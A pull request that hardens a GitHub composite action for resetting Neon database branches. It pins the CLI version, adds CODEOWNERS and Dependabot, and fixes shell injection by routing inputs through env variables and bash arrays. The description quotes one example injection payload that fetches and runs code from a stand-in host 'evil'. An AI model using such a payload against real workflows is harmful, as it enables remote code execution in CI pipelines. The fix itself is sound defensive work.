### PR TITLE
Supply-chain hardening + shell-injection fix

### DIFF
--- a/.github/dependabot.yml
+++ b/.github/dependabot.yml
@@ -1,0 +1,13 @@
+version: 2
+updates:
+  - package-ecosystem: github-actions
+    directory: /
+    schedule:
+      interval: weekly
+      day: monday
+    groups:
+      actions-minor-patch:
+        update-types:
+          - minor
+          - patch
+    open-pull-requests-limit: 5

--- a/CODEOWNERS
+++ b/CODEOWNERS
@@ -1,0 +1,1 @@
+* @neondatabase/product-engineering-workflow

--- a/action.yml
+++ b/action.yml
@@ -61,7 +61,7 @@ runs:
   using: 'composite'
   steps:
     - uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0
-    - run: npm i -g neonctl@v2
+    - run: npm i -g --ignore-scripts neonctl@2.22.0
       shell: bash
     - name: Reset branch
       env:

--- a/action.yml
+++ b/action.yml
@@ -67,46 +67,66 @@ runs:
       env:
         NEON_API_KEY: ${{ inputs.api_key }}
         NEON_API_HOST: ${{ inputs.api_host }}
+        INPUT_BRANCH: ${{ inputs.branch }}
+        INPUT_PROJECT_ID: ${{ inputs.project_id }}
+        INPUT_PARENT: ${{ inputs.parent }}
+        INPUT_CS_ROLE_NAME: ${{ inputs.cs_role_name }}
+        INPUT_CS_DATABASE: ${{ inputs.cs_database }}
+        INPUT_CS_SSL: ${{ inputs.cs_ssl }}
+        INPUT_CS_PRISMA: ${{ inputs.cs_prisma }}
       id: reset-branch
       shell: bash
       run: |
-        neonctl branches reset ${{ inputs.branch }} \
-          --project-id ${{ inputs.project_id }} \
-          $(if [[ -n "${{ inputs.parent }}" ]] && [[ "${{ inputs.parent }}" != "false" ]]; then echo "--parent"; fi) \
-          --output json \
-          > branch_out
-        
+        reset_args=("branches" "reset" "$INPUT_BRANCH" "--project-id" "$INPUT_PROJECT_ID")
+        if [[ -n "$INPUT_PARENT" ]] && [[ "$INPUT_PARENT" != "false" ]]; then
+          reset_args+=("--parent")
+        fi
+        reset_args+=("--output" "json")
+
+        neonctl "${reset_args[@]}" > branch_out
+
         echo "branch reset out:"
         cat branch_out
 
-        branch_id=$(cat branch_out | jq --raw-output '.id')
-        echo "branch_id=${branch_id}" >> $GITHUB_OUTPUT
-        
+        branch_id=$(jq --raw-output '.id' < branch_out)
+        echo "branch_id=${branch_id}" >> "$GITHUB_OUTPUT"
+
         cs_json () {
-          neonctl cs ${branch_id} \
-          --project-id ${{ inputs.project_id }} \
-          $(if [[ -n "${{ inputs.cs_role_name }}" ]] && [[ "${{ inputs.cs_role_name }}" != "false" ]]; then echo "--role-name ${{ inputs.cs_role_name }}"; fi) \
-          $(if [[ -n "${{ inputs.cs_database }}" ]] && [[ "${{ inputs.cs_database }}" != "false" ]]; then echo "--database-name ${{ inputs.cs_database }}"; fi) \
-          $(if [[ -n "${{ inputs.cs_ssl }}" ]]; then echo "--ssl ${{ inputs.cs_ssl }}"; fi) \
-          $(if [[ -n "${{ inputs.cs_prisma }}" ]]; then echo "--prisma ${{ inputs.cs_prisma }}"; fi) \
-          --extended -o json \
-          $(if [[ -n "$1" ]]; then echo "--pooled"; fi)
+          local pooled="$1"
+          local args=("cs" "$branch_id" "--project-id" "$INPUT_PROJECT_ID")
+          if [[ -n "$INPUT_CS_ROLE_NAME" ]] && [[ "$INPUT_CS_ROLE_NAME" != "false" ]]; then
+            args+=("--role-name" "$INPUT_CS_ROLE_NAME")
+          fi
+          if [[ -n "$INPUT_CS_DATABASE" ]] && [[ "$INPUT_CS_DATABASE" != "false" ]]; then
+            args+=("--database-name" "$INPUT_CS_DATABASE")
+          fi
+          if [[ -n "$INPUT_CS_SSL" ]]; then
+            args+=("--ssl" "$INPUT_CS_SSL")
+          fi
+          if [[ -n "$INPUT_CS_PRISMA" ]]; then
+            args+=("--prisma" "$INPUT_CS_PRISMA")
+          fi
+          args+=("--extended" "-o" "json")
+          if [[ -n "$pooled" ]]; then
+            args+=("--pooled")
+          fi
+          neonctl "${args[@]}"
         }
-        
+
         CS_JSON=$(cs_json)
         CS_JSON_POOLED=$(cs_json true)
-        DB_URL=$(echo $CS_JSON | jq -r '.connection_string')
-        DB_URL_WITH_POOLER=$(echo $CS_JSON_POOLED | jq -r '.connection_string')
-        
-        echo "db_url=${DB_URL}" >> $GITHUB_OUTPUT
-        echo "db_url_with_pooler=${DB_URL_WITH_POOLER}" >> $GITHUB_OUTPUT
-        
-        HOST=$(echo $CS_JSON | jq -r '.host')
-        HOST_WITH_POOLER=$(echo $CS_JSON_POOLED | jq -r '.host')
-        echo "host=${HOST}" >> $GITHUB_OUTPUT
-        echo "host_with_pooler=${HOST_WITH_POOLER}" >> $GITHUB_OUTPUT
-        
-        PASSWORD=$(echo $CS_JSON | jq -r '.password')
+        DB_URL=$(echo "$CS_JSON" | jq -r '.connection_string')
+        DB_URL_WITH_POOLER=$(echo "$CS_JSON_POOLED" | jq -r '.connection_string')
+
+        echo "db_url=${DB_URL}" >> "$GITHUB_OUTPUT"
+        echo "db_url_with_pooler=${DB_URL_WITH_POOLER}" >> "$GITHUB_OUTPUT"
+
+        HOST=$(echo "$CS_JSON" | jq -r '.host')
+        HOST_WITH_POOLER=$(echo "$CS_JSON_POOLED" | jq -r '.host')
+        echo "host=${HOST}" >> "$GITHUB_OUTPUT"
+        echo "host_with_pooler=${HOST_WITH_POOLER}" >> "$GITHUB_OUTPUT"
+
+        PASSWORD=$(echo "$CS_JSON" | jq -r '.password')
         echo $'\n'
         echo "::add-mask::${PASSWORD}"
-        echo "password=${PASSWORD}" >> $GITHUB_OUTPUT
+        echo "password=${PASSWORD}" >> "$GITHUB_OUTPUT"


### PR DESCRIPTION
## Summary

Supply-chain hardening for this composite action, plus a shell-injection fix in the `Reset branch` step. No behavior change for legitimate inputs.

**What changed (4 commits):**

1. **Pin `neonctl` to an exact version and skip install scripts.** Replace `npm i -g neonctl@v2` (mutable npm dist-tag) with `npm i -g --ignore-scripts neonctl@2.22.0`. Every consumer now installs the same audited build, and `--ignore-scripts` blocks the `preinstall`/`postinstall` family of npm supply-chain attacks (the event-stream / ua-parser-js class).

2. **Add `CODEOWNERS`** requiring review from `@neondatabase/product-engineering-workflow` on all changes.

3. **Add `.github/dependabot.yml`** for the `github-actions` ecosystem only (weekly on Monday, minor+patch grouped, max 5 open PRs). Future SHA bumps get patched automatically.

4. **Fix shell-injection footguns in the `Reset branch` step.** Route all 7 inputs (`branch`, `project_id`, `parent`, `cs_role_name`, `cs_database`, `cs_ssl`, `cs_prisma`) through the step's `env:` block and reference them as quoted bash variables (`"$INPUT_BRANCH"`, etc.). GitHub Actions substitutes `${{ inputs.* }}` expressions textually into the rendered shell script *before* bash parses it, so a downstream caller wiring an input from PR-controlled data could break out with a payload like `x";curl evil|sh;#`. The `echo "--role-name ${{ inputs.cs_role_name }}"` pattern inside `cs_json()` was particularly bad: it inserted the input into a command string that was itself injected into the outer `neonctl cs ...` call, giving an attacker two layers of shell context to escape. Env-var routing puts the value in the process environment as data; the inline `$(if [[ -n ... ]]; then echo "..."; fi)` patterns are rewritten as proper bash conditionals that append to a `args=(...)` array, then expanded as `"${args[@]}"` so each value is passed as a single argument regardless of contents.

**SHA-pinning**

The single `uses:` reference in `action.yml` (`actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0`) was already SHA-pinned by PR #19. No change needed here.

## Verification trail

- `neonctl@2.22.0`: GitHub release [v2.22.0](https://github.com/neondatabase/neonctl/releases/tag/v2.22.0), commit [`52c493d`](https://github.com/neondatabase/neonctl/commit/52c493d17a6da5502f80958da63699c46d55139e), `package.json` `version: "2.22.0"` at that ref.

## Test plan

- [x] `action.yml` parses cleanly (`python3 -c "import yaml; yaml.safe_load(...)"`).
- [x] `.github/dependabot.yml` parses cleanly (same check).
- [x] All `uses:` references in `action.yml` are SHA-pinned — verified by:
  ```bash
  grep -rEn 'uses:[[:space:]]+[^[:space:]]+@[^[:space:]#]+' action.yml \
    | grep -vE 'uses:[[:space:]]+[a-zA-Z0-9._/-]+@[0-9a-f]{40}([[:space:]]|$)'
  ```
  returns no results.
- [ ] Manual smoke test: invoke this action from a test workflow with a real `branch` input and confirm the branch is reset, and `db_url` / `host` / `password` outputs are populated.
- [ ] Manual smoke test with `parent: true` (re-parent path) to confirm that branch.
- [ ] Manual smoke test with `cs_role_name`, `cs_database`, `cs_ssl`, `cs_prisma` set to confirm the optional connection-string flags are passed through correctly after the array-based rewrite.

## Notes for reviewers

- The shell-injection fix in commit 4 is the only behavior-affecting change, and only for malformed/malicious inputs — legitimate `branch` / `project_id` / `parent` / `cs_*` values pass through identically.
